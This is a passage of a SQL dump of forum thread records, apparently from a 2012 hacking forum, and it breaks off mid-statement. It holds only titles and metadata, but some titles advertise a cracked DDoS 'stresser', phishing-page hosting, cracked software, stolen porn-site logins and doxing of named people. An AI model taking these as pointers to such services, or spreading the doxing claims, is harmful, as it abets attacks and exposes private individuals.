(`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('892', '8', 'Post New And Awesome Songs Here !!!', '0', '0', '0', '228', 'VirtualLegend', '1350393859', '4879', '1350554104', 'R?????zo?', '62', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('897', '9', 'YouTube SEO - Like a baws.', '0', '0', '0', '264', 'D?ea', '1350400935', '4897', '1350500988', 'D?ea', '264', '26', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('893', '77', 'GamerTag Availability Checker Site', '0', '0', '0', '100', '??zg???g????61', '1350395912', '4885', '1351648312', 'CommandoModz', '306', '21', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('894', '21', '[FREE] Anonymous Stresser [Cracked]', '0', '0', '0', '100', '??zg???g????61', '1350396459', '4886', '1350759665', 't3h jok3r', '1', '47', '9', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('898', '71', 'Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '0', '0', '228', 'VirtualLegend', '1350406194', '4906', '1350446676', 'XxTREYZxX', '257', '20', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('895', '4', 'D?ea saying hello<3', '0', '0', '0', '264', 'D?ea', '1350398963', '4887', '1350469601', 'D?ea', '264', '30', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('896', '23', 'How to secure your Router', '0', '0', '0', '264', 'D?ea', '1350399187', '4892', '1350724867', 'R?????zo?', '62', '33', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('899', '7', '[Demo] New L33THacking Skype Resolver', '0', '0', '0', '61', 'NXK', '1350419409', '4919', '1350475280', 'NXK', '61', '45', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('900', '63', 'Who wants a New Signature !!! | I will make one for you!', '0', '0', '0', '228', 'VirtualLegend', '1350424596', '4929', '1351638587', 'VirtualLegend', '228', '75', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('901', '19', '[Junk]L33THacking Skype Resolver!', '0', '0', '0', '214', 'Rave™', '1350424793', '4930', '1350700030', 't3h jok3r', '1', '30', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('903', '50', 'Report against a thread', '0', '0', '0', '5', 'Timmy', '1350432711', '4952', '1350432711', 'Timmy', '5', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('902', '52', 'Who wants a Tutorial on how to make a Generator in VB', '0', '0', '0', '228', 'VirtualLegend', '1350427511', '4937', '1350903396', 'VirtualLegend', '228', '18', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('904', '7', 'New Official L33THacking Skype Group Chat', '0', '0', '0', '3', '??????????¢™', '1350434160', '4965', '1350500448', 'R?????zo?', '62', '33', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('906', '42', 'DOX of Kody Maxson', '0', '0', '0', '1', 't3h jok3r', '1350439287', '4982', '1350762622', 'Apathy', '2', '58', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('905', '42', 'Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '0', '0', '8', 'spacefish36', '1350435281', '4966', '1350544871', 'HoverCatz', '67', '34', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('907', '7', 'Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '0', '0', '3', '??????????¢™', '1350444382', '4998', '1350690790', '??????????¢™', '3', '49', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('908', '54', '[17OCT]bangbros,mofos,pornpros,realitykings,vivid,naughtyamerica,brazzers and many', '0', '0', '0', '255', 'sbhshroy2', '1350444662', '4999', '1350461363', 'R?????zo?', '62', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('909', '19', '[Junk]Give me HF rep pl0x...', '0', '0', '0', '222', 'Exposé', '1350448256', '5014', '1350450592', 't3h jok3r', '1', '11', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('910', '49', 'Referral Contest?', '0', '0', '0', '222', 'Exposé', '1350448890', '5021', '1350834757', 'iTzIpod', '82', '29', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('911', '7', 'Anyone have experience in wordpress?', '0', '0', '0', '222', 'Exposé', '1350449054', '5022', '1350449054', 'Exposé', '222', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('912', '7', 'Woah Awesome. Something you should check.', '0', '0', '0', '5', 'Timmy', '1350449185', '5023', '1350548291', 'PiXEL^OG', '258', '41', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('913', '7', 'Anarchyforums.net - Owner is a well known scammer', '0', '0', '0', '5', 'Timmy', '1350449280', '5024', '1350471245', 'mothered', '205', '21', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('914', '7', 'Advertise on Pasteheaven!', '0', '0', '0', '222', 'Exposé', '1350451233', '5041', '1350460714', 'R?????zo?', '62', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('915', '7', 'PasteIT AIO - By ƒ???????????g', '0', '0', '0', '222', 'Exposé', '1350454860', '5043', '1350536763', 'Exposé', '222', '59', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('919', '7', '[Free] Custom Mousepad - Only $1 with free shipping', '0', '0', '0', '264', 'D?ea', '1350477472', '5099', '1350501141', 'D?ea', '264', '28', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('917', '7', 'Please help me', '0', '0', '0', '264', 'D?ea', '1350472978', '5087', '1350472978', 'D?ea', '264', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('916', '3', 'Subject too long', '0', '0', '0', '62', 'R?????zo?', '1350461871', '5066', '1350526430', '??????????¢™', '3', '26', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('918', '65', 'I feel famous', '0', '0', '0', '264', 'D?ea', '1350473034', '5088', '1351011709', 'D?ea', '264', '83', '26', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('920', '49', '[IDEA] Award System', '0', '12', '0', '264', 'D?ea', '1350497366', '5118', '1350502850', 'D?ea', '264', '42', '16', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('921', '4', 'Hey', '0', '6', '0', '270', 'LCS', '1350499559', '5120', '1350593964', 'iTzIpod', '82', '46', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('922', '9', '???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '0', '0', '270', 'LCS', '1350499669', '5121', '1350651248', 'LCS', '270', '55', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('927', '72', 'BLACK OPS ZOMBIE TIPS', '0', '0', '0', '257', 'XxTREYZxX', '1350519699', '5191', '1350551003', 'XxTREYZxX', '257', '12', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1000', '3', 'Congrats NXK and ??????????¢™', '0', '0', '0', '222', 'Exposé', '1350705335', '5654', '1350789911', 't3h jok3r', '1', '31', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('923', '73', 'no more series', '0', '0', '0', '257', 'XxTREYZxX', '1350503923', '5172', '1350503923', 'XxTREYZxX', '257', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1002', '3', 'New mods and forum updates', '0', '0', '0', '1', 't3h jok3r', '1350707318', '5666', '1350790108', 't3h jok3r', '1', '98', '19', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('924', '71', 'Ratchet and Clank @#$%^&^&*(', '0', '0', '0', '257', 'XxTREYZxX', '1350504088', '5173', '1350504088', 'XxTREYZxX', '257', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('925', '7', 'gaming thread down(READ)', '0', '0', '0', '257', 'XxTREYZxX', '1350504529', '5174', '1350526091', 'XxTREYZxX', '257', '16', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('928', '49', 'MOTM', '0', '0', '0', '257', 'XxTREYZxX', '1350522467', '5194', '1350755502', 'iTzIpod', '82', '80', '22', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('929', '49', 'AWARD SYSTEM', '0', '0', '0', '257', 'XxTREYZxX', '1350522686', '5196', '1350525546', 't3h jok3r', '1', '14', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('930', '7', 'am i a nice and helpfull member', '0', '0', '0', '257', 'XxTREYZxX', '1350523176', '5197', '1350771623', 'mothered', '205', '44', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('931', '19', '[Junk]Joker\'s DOX', '0', '0', '0', '272', 'YuckFou', '1350526766', '5238', '1350526820', 't3h jok3r', '1', '10', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('932', '19', '[Junk]Joker\'s DOX - Updated', '0', '0', '0', '272', 'YuckFou', '1350526964', '5240', '1350527029', 't3h jok3r', '1', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('933', '19', '[Junk]Joker\'s DOX - Updated', '0', '0', '0', '272', 'YuckFou', '1350527053', '5242', '1350527075', 't3h jok3r', '1', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('984', '7', 'What size pizza can you eat?', '0', '0', '0', '205', 'mothered', '1350621080', '5533', '1350638003', 'R?????zo?', '62', '12', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('935', '19', '[Junk][Junk]Couple of cracked programs.', '0', '0', '0', '5', 'Timmy', '1350530747', '5256', '1350561999', 'NXK', '61', '10', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('936', '18', '4 adf.ly bots with proxygrabber', '0', '0', '0', '5', 'Timmy', '1350531132', '5257', '1350782763', 'XxTREYZxX', '257', '24', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('937', '19', '[Junk]Nude Bot- Mr. Do you want to fap?', '0', '0', '0', '5', 'Timmy', '1350531240', '5258', '1351835566', 't3h jok3r', '1', '32', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('938', '46', 'List of good webhosts to host your phishing pages', '0', '0', '0', '5', 'Timmy', '1350531544', '5259', '1350873721', 'Exposé', '222', '33', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('939', '49', 'a contest', '0', '0', '0', '257', 'XxTREYZxX', '1350542350', '5267', '1350593919', 'iTzIpod', '82', '9', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('940', '7', 'TheAnarchist I have your dox!', '0', '0', '0', '222', 'Exposé', '1350542961', '5270', '1350574549', 'NXK', '61', '40', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('941', '35', 'Logo Competition for LH?', '0', '0', '0', '222', 'Exposé', '1350543143', '5271', '1350561413', 'NXK', '61', '25', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('942', '49', 'DDos protected hosting?', '0', '0', '0', '222', 'Exposé', '1350544212', '5277', '1350609639', 't3h jok3r', '1', '25', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('943', '74', 'MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '17', '0', '257', 'XxTREYZxX', '1350544909', '5283', '1350745904', 'iTzIpod', '82', '18', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('947', '8', 'GANGNAM STYLE', '0', '0', '0', '257', 'XxTREYZxX', '1350553535', '5329', '1351052222', 'mothered', '205', '61', '17', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('944', '66', 'What\'s your BF3 Method-ology?', '0', '0', '0', '222', 'Exposé', '1350544960', '5284', '1350837129', 'NXK', '61', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('945', '7', 'I dont want.......', '0', '0', 